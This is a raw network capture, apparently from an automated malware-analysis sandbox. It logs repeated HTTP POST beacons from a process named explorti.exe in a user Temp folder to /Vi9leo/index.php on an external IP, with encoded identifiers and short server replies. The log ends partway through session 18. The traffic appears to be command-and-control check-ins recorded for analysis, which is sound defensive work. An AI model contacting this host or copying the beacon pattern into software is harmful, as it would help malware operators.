Jul 27, 2024 04:50:11.413577080 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:11.660523891 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:11.769718885 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:12.537734032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:12.538479090 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:12.790344000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:12.912672043 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:13.665246010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:13.666126013 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:13.915050983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:14.034913063 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:14.781486034 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:14.782449961 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:15.029051065 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:15.144942999 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:15.926115036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:15.927194118 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:16.907579899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:17.019382954 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:17.773473978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:17.774467945 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:18.023941994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:18.149038076 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:18.919363022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:18.921818972 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:19.171632051 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:19.284646034 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:20.028937101 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:20.032079935 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:20.315298080 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:20.431212902 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:21.179347038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:21.180248976 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:21.438505888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:21.551347971 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:22.318650007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:22.323117971 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:22.575063944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:22.709281921 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:23.451471090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:23.453860044 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:23.703874111 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:23.816864014 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:24.573972940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:24.575294018 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:24.824321985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49754	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:24.942487955 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:25.709261894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:25.758819103 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:26.009922981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
